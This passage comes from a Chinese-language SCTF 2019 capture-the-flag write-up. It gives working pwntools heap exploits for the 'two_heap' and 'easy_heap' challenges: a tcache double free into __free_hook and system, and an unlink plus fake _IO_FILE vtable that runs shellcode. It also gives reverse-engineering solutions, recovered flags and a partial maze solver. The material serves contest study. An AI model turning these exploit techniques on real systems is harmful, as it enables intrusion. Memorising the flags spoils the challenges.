address, count=<span class="number">0</span>   :ctx.leak(address, count)</span><br><span class="line">    </span><br><span class="line">    uu32    = <span class="keyword">lambda</span> data   :u32(data.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">    uu64    = <span class="keyword">lambda</span> data   :u64(data.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line"></span><br><span class="line">    debugg = <span class="number">0</span></span><br><span class="line">    logg = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    ctx.binary = <span class="string">'./two_heap'</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">#if debugg:</span></span><br><span class="line">    <span class="comment">#	ctx.custom_lib_dir = '/glibc/x64/2.26/lib/'</span></span><br><span class="line">    <span class="comment">#else:</span></span><br><span class="line">    <span class="comment">#	ctx.custom_lib_dir = '/glibc/x64/2.26/lib/'#remote libc</span></span><br><span class="line">    ctx.remote_libc = <span class="string">'./libc-2.26.so'</span></span><br><span class="line">    ctx.debug_remote_libc = <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    ctx.symbols = &#123;<span class="string">'heap'</span>:<span class="number">0x4020</span>&#125;</span><br><span class="line">    <span class="comment">#ctx.breakpoints = [0x1234, 0x5678]</span></span><br><span class="line">    <span class="comment">#ctx.debug()</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> debugg:</span><br><span class="line">        rs()</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        ctx.remote = (<span class="string">'47.104.89.129'</span>, <span class="number">10002</span>)</span><br><span class="line">        rs(method = <span class="string">'remote'</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> logg:</span><br><span class="line">        context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">choice</span><span class="params">(num)</span>:</span></span><br><span class="line">        sla(<span class="string">'choice:'</span>,num)</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(asize,acon)</span>:</span></span><br><span class="line">        choice(<span class="number">1</span>)</span><br><span class="line">        sla(<span class="string">'size:'</span>,asize)</span><br><span class="line">        sla(<span class="string">'note:'</span>,acon)</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">(aid)</span>:</span></span><br><span class="line">        choice(<span class="number">2</span>)</span><br><span class="line">        sla(<span class="string">'index:'</span>,aid)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    sla(<span class="string">'SCTF:'</span>,<span class="string">'%a%a%a%a%a'</span>)</span><br><span class="line">    ru(<span class="string">'0x0p+00x0p+00x0.0'</span>)</span><br><span class="line">    libc_base = (int(ru(<span class="string">'p'</span>),<span class="number">16</span>) &lt;&lt; <span class="number">4</span>) - <span class="number">0x18b720</span></span><br><span class="line">    log.success(<span class="string">"libc_base = %s"</span>%hex(libc_base))</span><br><span class="line">    libc = ELF(<span class="string">'./libc-2.26.so'</span>)</span><br><span class="line">    malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">    free_hook = libc_base + libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">    free_hook = libc_base + <span class="number">0x18d5a8</span></span><br><span class="line">    malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">    system = libc_base + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">    system = libc_base + <span class="number">0x21f80</span></span><br><span class="line">    add(<span class="number">0x60</span>,<span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">    add(<span class="number">0x30</span>,<span class="string">'111'</span>)</span><br><span class="line">    choice(<span class="number">1</span>)</span><br><span class="line">    sla(<span class="string">'size:'</span>,<span class="number">0</span>)<span class="comment">#2</span></span><br><span class="line">    free(<span class="number">2</span>)</span><br><span class="line">    free(<span class="number">2</span>)</span><br><span class="line">    add(<span class="number">0x10</span>,p64(free_hook))</span><br><span class="line">    log.success(<span class="string">"free_hook = %s"</span>%hex(free_hook))</span><br><span class="line">    add(<span class="number">8</span>,<span class="string">'AAA'</span>)</span><br><span class="line">    add(<span class="number">0x18</span>,p64(system))</span><br><span class="line">    free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment">#ctx.debug()</span></span><br><span class="line">    irt()</span><br></pre></td></tr></table></figure>

<h3 id="easy-heap"><a href="#easy-heap" class="headerlink" title="easy_heap"></a>easy_heap</h3><p> 这个pwn题漏洞很明显，在0xe2d处，看见该读函数存在一字节溢出，该字节为0。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __int64 __<span class="function">fastcall <span class="title">some_read_nterm_0end</span><span class="params">(<span class="keyword">char</span> *dst, <span class="keyword">unsigned</span> __int64 len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+13h] [rbp-Dh]</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v5; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; len; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( read(<span class="number">0</span>, &amp;buf, <span class="number">1u</span>LL) &lt;= <span class="number">0</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      perror(<span class="string">"Read failed!\n"</span>);</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( buf == <span class="number">10</span> )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    dst[i] = buf;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( i == len )</span><br><span class="line">    dst[i] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>结合程序本身，只有程序基地址的泄露，以及mmap分配的可读/写/执行段的地址，没有libc或者堆栈地址。由此大致可猜测这个是需要最终执行shellcode的。</p>
<p>首先可以使用一字节溢出进行unlink攻击，由此获取任意写的能力，将shellcode写入mmap段，然后就需要考虑如何劫持控制流。</p>
<p>由于给的libc是2.23版本，该版本是没有对_IO_File结构体的vtable进行检查的，所以这个可以通过篡改unsorted bin的bk指针至_IO_list_all-0x10处，导致_IO_list_all被篡改，最终进行一个经典的文件结构体伪造，vtable即指向我们可控的程序段，里面则写上mmap段地址，当出现堆错误打印信息时，即可触发。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PwnContext <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">    context.log_level = <span class="string">'debug'</span></span><br><span class="line">    <span class="comment">#-----function for quick script-----#</span></span><br><span class="line">    s       = <span class="keyword">lambda</span> data               :ctx.send(str(data))        <span class="comment">#in case that data is a int</span></span><br><span class="line">    sa      = <span class="keyword">lambda</span> delim,data         :ctx.sendafter(str(delim), str(data)) </span><br><span class="line">    st      = <span class="keyword">lambda</span> delim,data         :ctx.sendthen(str(delim), str(data)) </span><br><span class="line">    sl      = <span class="keyword">lambda</span> data               :ctx.sendline(str(data)) </span><br><span class="line">    sla     = <span class="keyword">lambda</span> delim,data         :ctx.sendlineafter(str(delim), str(data))</span><br><span class="line">    r       = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :ctx.recv(numb)</span><br><span class="line">    ru      = <span class="keyword">lambda</span> delims, drop=<span class="keyword">True</span>  :ctx.recvuntil(delims, drop)</span><br><span class="line">    irt     = <span class="keyword">lambda</span>                    :ctx.interactive()</span><br><span class="line">    </span><br><span class="line">    rs      = <span class="keyword">lambda</span> *args, **kwargs    :ctx.start(*args, **kwargs)</span><br><span class="line">    leak    = <span class="keyword">lambda</span> address, count=<span class="number">0</span>   :ctx.leak(address, count)</span><br><span class="line">    </span><br><span class="line">    uu32    = <span class="keyword">lambda</span> data   :u32(data.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">    uu64    = <span class="keyword">lambda</span> data   :u64(data.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">    </span><br><span class="line">    ctx.binary = <span class="string">'./easy_heap'</span></span><br><span class="line">    ctx.remote = (<span class="string">'132.232.100.67'</span>, <span class="number">10004</span>)</span><br><span class="line">    </span><br><span class="line">    ctx.custom_lib_dir = <span class="string">'/root/share/project/glibc-all-in-one/libs/2.23-0ubuntu11_amd64'</span></span><br><span class="line">    <span class="comment">#ctx.remote_libc = './libc.so.6'</span></span><br><span class="line">    ctx.debug_remote_libc = <span class="keyword">True</span></span><br><span class="line">    </span><br><span class="line">    ctx.symbols = &#123;</span><br><span class="line">        <span class="string">'lst'</span>:<span class="number">0x202060</span>,</span><br><span class="line">        <span class="string">'cnt'</span>:<span class="number">0x202040</span>,</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size)</span>:</span></span><br><span class="line">        sl(<span class="number">1</span>)</span><br><span class="line">        sla(<span class="string">'Size'</span>, size)</span><br><span class="line">        ru(<span class="string">'Address '</span>)</span><br><span class="line">        addr = int(ru(<span class="string">'\n'</span>), <span class="number">16</span>)</span><br><span class="line">        <span class="keyword">return</span> addr</span><br><span class="line">        </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">(idx)</span>:</span></span><br><span class="line">        sl(<span class="number">2</span>)</span><br><span class="line">        sla(<span class="string">'Index'</span>, idx)</span><br><span class="line">        </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">fill</span><span class="params">(idx, content)</span>:</span></span><br><span class="line">        sl(<span class="number">3</span>)</span><br><span class="line">        sla(<span class="string">'Index'</span>, idx)</span><br><span class="line">        sa(<span class="string">'Content'</span>, content)</span><br><span class="line">        </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            rs(<span class="string">'remote'</span>)</span><br><span class="line">            <span class="comment">#ctx.debug(gdbscript='c')</span></span><br><span class="line">            </span><br><span class="line">            ru(<span class="string">'Mmap: '</span>)</span><br><span class="line">            mmap_addr = int(ru(<span class="string">'\n'</span>), <span class="number">16</span>)</span><br><span class="line">            </span><br><span class="line">            prog_base = add(<span class="number">0xf8</span>) - <span class="number">0x202068</span></span><br><span class="line">            add(<span class="number">0xf0</span>)</span><br><span class="line">            </span><br><span class="line">            add(<span class="number">0x20</span>)</span><br><span class="line">            </span><br><span class="line">            target = prog_base+<span class="number">0x202068</span></span><br><span class="line">            payload1 = p64(<span class="number">0</span>) + p64(<span class="number">0xf1</span>)</span><br><span class="line">            payload1 += p64(target<span class="number">-0x18</span>) + p64(target<span class="number">-0x10</span>)</span><br><span class="line">            payload1 = payload1.ljust(<span class="number">0xf0</span>, <span class="string">'\0'</span>)</span><br><span class="line">            payload1 += p64(<span class="number">0xf0</span>)</span><br><span class="line">            fill(<span class="number">0</span>, payload1)</span><br><span class="line">            </span><br><span class="line">            <span class="comment">#unlink </span></span><br><span class="line">            free(<span class="number">1</span>)</span><br><span class="line">            </span><br><span class="line">            <span class="function"><span class="keyword">def</span> <span class="title">vuln_write</span><span class="params">(addr, content)</span>:</span></span><br><span class="line">                payload = p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">                payload += p64(<span class="number">0xf8</span>) + p64(prog_base+<span class="number">0x202050</span>)</span><br><span class="line">                payload += p64(<span class="number">0x1000</span>) + p64(addr)</span><br><span class="line">                fill(<span class="number">0</span>, payload + <span class="string">'\n'</span>)</span><br><span class="line">                sleep(<span class="number">0.5</span>)</span><br><span class="line">                fill(<span class="number">1</span>, content + <span class="string">'\n'</span>)</span><br><span class="line">                </span><br><span class="line">            </span><br><span class="line">            vuln_write(mmap_addr, asm(shellcraft.sh()))</span><br><span class="line">            </span><br><span class="line">            add(<span class="number">0x20</span>)</span><br><span class="line">            </span><br><span class="line">            payload2 = p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload2 += p64(<span class="number">0xf8</span>) + p64(prog_base+<span class="number">0x202050</span>)</span><br><span class="line">            payload2 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload2 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload2 += p64(<span class="number">8</span>) + <span class="string">'\x48'</span></span><br><span class="line">            fill(<span class="number">0</span>, payload2 + <span class="string">'\n'</span>)</span><br><span class="line">            fill(<span class="number">3</span>, <span class="string">'\x61\x00\n'</span>)</span><br><span class="line">            </span><br><span class="line">            </span><br><span class="line">            payload3 = p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload3 += p64(<span class="number">0xf8</span>) + p64(prog_base+<span class="number">0x202050</span>)</span><br><span class="line">            payload3 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload3 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload3 += p64(<span class="number">8</span>) + <span class="string">'\x58'</span></span><br><span class="line">            fill(<span class="number">0</span>, payload3 + <span class="string">'\n'</span>)</span><br><span class="line">            fill(<span class="number">3</span>, <span class="string">'\x10\x75\n'</span>)</span><br><span class="line">            </span><br><span class="line">            </span><br><span class="line">            payload4 = p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload4 += p64(<span class="number">0xf8</span>) + p64(prog_base+<span class="number">0x202050</span>)</span><br><span class="line">            payload4 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload4 += p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload4 += p64(<span class="number">0x1000</span>) + <span class="string">'\x60'</span></span><br><span class="line">            fill(<span class="number">0</span>, payload4 + <span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            fake_vtable = prog_base + <span class="number">0x202070</span></span><br><span class="line">            payload5 = p64(<span class="number">2</span>) + p64(<span class="number">3</span>)</span><br><span class="line">            payload5 = payload5.ljust(<span class="number">0xb8</span>,<span class="string">'\x00'</span>)</span><br><span class="line">            payload5 += p64(fake_vtable)</span><br><span class="line">            </span><br><span class="line">            fill(<span class="number">3</span>, payload5 + <span class="string">'\n'</span>)</span><br><span class="line">            </span><br><span class="line">            payload6 = p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">            payload6 += p64(<span class="number">0xf8</span>) + p64(prog_base+<span class="number">0x202050</span>)</span><br><span class="line">            payload6 += p64(mmap_addr) * <span class="number">8</span></span><br><span class="line">            fill(<span class="number">0</span>, payload6 + <span class="string">'\n'</span>)</span><br><span class="line">            </span><br><span class="line">            <span class="comment">#now trigger</span></span><br><span class="line">            sleep(<span class="number">0.1</span>)</span><br><span class="line">            sl(<span class="number">1</span>)</span><br><span class="line">            sla(<span class="string">'Size'</span>, <span class="number">1</span>)</span><br><span class="line">            sleep(<span class="number">0.1</span>)</span><br><span class="line">            <span class="keyword">if</span> ctx.connected():</span><br><span class="line">                irt()</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="Crackme"><a href="#Crackme" class="headerlink" title="Crackme"></a>Crackme</h3><p>有个全局字符串，不运行值不是这个的：<br>nKnbHsgqD3aNEB91jB3gEzAr+IklQwT1bSs3+bXpeuo=</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">iv = <span class="string">b'\x00'</span>*<span class="number">16</span></span><br><span class="line">key = <span class="string">'sycloversyclover'</span></span><br><span class="line">mode = AES.MODE_CBC</span><br><span class="line">cryptos = AES.new(key, mode, iv)</span><br><span class="line">a = <span class="string">b'sctf'</span>*<span class="number">4</span></span><br><span class="line">raw = cryptos.decrypt(base64.b64decode(<span class="string">'nKnbHsgqD3aNEB91jB3gEzAr+IklQwT1bSs3+bXpeuo='</span>))</span><br><span class="line">flag = <span class="string">b''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">16</span>):</span><br><span class="line">    flag += bytes(chr(a[i] ^ raw[i]), encoding=<span class="string">'utf-8'</span>)</span><br><span class="line">flag += raw[<span class="number">16</span>:].replace(<span class="string">b'\x05'</span>, <span class="string">b''</span>)</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<h3 id="babyre"><a href="#babyre" class="headerlink" title="babyre"></a>babyre</h3><p>题目总共分为三个关卡，解出三个关卡就可以得到flag</p>
<p>第一关是一个迷宫，共分为5层</p>
<p><img src="https://img.5am3.com/20190624156134900767013.png" alt="20190624156134900767013.png"></p>
<p>wasd分别上下左右，x是上一层，y是下一层。</p>
<p>密码：ddwwxxssxaxwwaassyywwdd</p>
<p>第二层是一个base64的解密函数，由于不是逆向选手，傻傻地怼汇编了好久，发现是base64</p>
<p>于是，将sctf_9102字符串base64加密就得到pass了。c2N0Zl85MTAy，但是，我用c2N0Zl85MTAyCg也是可以过的，</p>
<p>第三层是sm4的魔改，我还原了一下这个加密，由于对称加密，不带秘钥，实际将给定的字符串反过来，再加密就是明文了</p>
<p><img src="https://img.5am3.com/20190624156134902133599.png" alt="20190624156134902133599.png"></p>
<p>其实也可以，将反过来的字符串输入至第三关中，从内存dump下加密的结果，有兴趣可以试下。</p>
<h3 id="Strange-apk"><a href="#Strange-apk" class="headerlink" title="Strange apk"></a>Strange apk</h3><p>Apk脱壳：容易观察到apk使用第一代dex落地加载加固保护技术，解密算法为简单的异或。</p>
<p><img src="https://img.5am3.com/20190624156134920084292.png" alt="20190624156134920084292.png"></p>
<p><img src="https://img.5am3.com/20190624156134921258930.png" alt="20190624156134921258930.png"></p>
<p>观察到flag为30个字符，前十二个字符base64加密后未“<strong>c2N0ZntXM2xjMG1l</strong>”，明文为“sctf{W3lc0me”，后面18个字符会被传到其他activity。</p>
<p><img src="https://img.5am3.com/20190624156134923825127.png" alt="20190624156134923825127.png"></p>
<p>后18个字符验证逻辑如下，encode函数参数一为该18个字符，参数二为syclover进行md5加密后的结果。分析后发现只需要将”<del>8t808_8A8n848r808i8d8-8w808r8l8d8}8”中所有的‘8’去掉即可，与前面的结果拼接故得到flag为“sctf{W3lc0me</del>t0_An4r0id-w0rld}”</p>
<p><img src="https://img.5am3.com/20190624156134925922058.png" alt="20190624156134925922058.png"></p>
<p><img src="https://img.5am3.com/2019062415613492699126.png" alt="2019062415613492699126.png"></p>
<h3 id="Music"><a href="#Music" class="headerlink" title="Music"></a>Music</h3><p>主activity只有没用的听音乐功能，是为了浪费调试时间的。直接修改入口类为Main2Activity。接着分析发现，程序执行成功与否取决于f变量。</p>
<p><img src="https://img.5am3.com/20190624156134929292773.png" alt="20190624156134929292773.png"></p>
<p>逻辑很简单，可以观察出a方法使用的变形版的rc4加密算法，加密后需要与某字符串相等（资源定位到改字符串为“C28BC39DC3A6C283C2B3C39DC293C289C2B8C3BAC29EC3A0C3A7C29A1654C3AF28C3A1C2B1215B53”）</p>
<p><img src="https://img.5am3.com/20190624156134932299445.png" alt="20190624156134932299445.png"></p>
<p><img src="https://img.5am3.com/20190624156134934463943.png" alt="20190624156134934463943.png"></p>
<p>至于rc4加密的第二个参数就是key，直接用JEB动态调试得到 </p>
<blockquote>
<p>E7E64BF658BAB14A25C9D67A054CEBE5</p>
</blockquote>
<p>唯一的坑点就是RC4算法</p>
<p><code>v3_1[v6] = ((char)(v2_1[v6] - v4 ^ (((char)v1[(v1[v4] + v1[v4] % v8) % v8]))));</code></p>
<p>这一行代码进行了变形，同时涉及到运算符优先级问题，将其改为</p>
<p><code>v3_1[v6] = (char)((v2_1[v6] ^ (((char)v1[(v1[v4] + v1[v4] % v8) % v8])))+ v4 );</code></p>
<p>再进行RC4解密即可成功得到flag</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>不知道谁签的….</p>
<h3 id="头号玩家"><a href="#头号玩家" class="headerlink" title="头号玩家"></a>头号玩家</h3><p>飞机一直往前开，开出去左上方显示flag，emmm，只要游戏打得好</p>
<p><img src="https://img.5am3.com/20190624156136139462352.png" alt="20190624156136139462352.png"></p>
<h3 id="Maaaaaaze"><a href="#Maaaaaaze" class="headerlink" title="Maaaaaaze"></a>Maaaaaaze</h3><p>最终是4056</p>
<p>处理一下网页然后算就完事了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">length=<span class="number">100</span></span><br><span class="line">width=<span class="number">100</span></span><br><span class="line">maze = [[[<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>] <span class="keyword">for</span> j <span class="keyword">in</span> range(width)]<span class="keyword">for</span> i <span class="keyword">in</span> range(length)]</span><br><span class="line">visited = [[<span class="number">0</span> <span class="keyword">for</span> j <span class="keyword">in</span> range(width)]<span class="keyword">for</span> i <span class="keyword">in</span> range(length)]</span><br><span class="line">mlength = <span class="number">0</span></span><br><span class="line">mnode = (<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dfs</span><span class="params">(i, j, depth)</span>:</span></span><br><span class="line"> <span class="keyword">global</span> mlength</span><br><span class="line"> <span class="comment"># print (i,j)</span></span><br><span class="line"> <span class="comment"># print maze[i][j]</span></span><br><span class="line"> visited[i][j]=<span class="number">1</span></span><br><span class="line"> <span class="comment"># print [visited[i-1][j], visited[i][j+1], visited[i-1][j], visited[i][j-1]]</span></span><br><span class="line"> <span class="keyword">while</span> <span class="keyword">True</span>:</span><br><span class="line">  test = <span class="number">0</span></span><br><span class="line">  ti = <span class="number">0</span></span><br><span class="line">  tj = <span class="number">0</span></span><br><span class="line">  <span class="keyword">if</span> maze[i][j][<span class="number">0</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i<span class="number">-1</span>][j]:</span><br><span class="line">   test += <span class="number">1</span></span><br><span class="line">   ti = <span class="number">-1</span></span><br><span class="line">  <span class="keyword">if</span> maze[i][j][<span class="number">1</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i][j+<span class="number">1</span>]:</span><br><span class="line">   test += <span class="number">1</span></span><br><span class="line">   tj = <span class="number">1</span></span><br><span class="line">  <span class="keyword">if</span> maze[i][j][<span class="number">2</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i+<span class="number">1</span>][j]:</span><br><span class="line">   test += <span class="number">1</span></span><br><span class="line">   ti = <span class="number">1</span></span><br><span class="line">  <span class="keyword">if</span> maze[i][j][<span class="number">3</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i][j<span class="number">-1</span>]:</span><br><span class="line">   test += <span class="number">1</span></span><br><span class="line">   tj = <span class="number">-1</span></span><br><span class="line">  <span class="keyword">if</span> test == <span class="number">1</span>:</span><br><span class="line">   i+=ti</span><br><span class="line">   j+=tj</span><br><span class="line">   depth+=<span 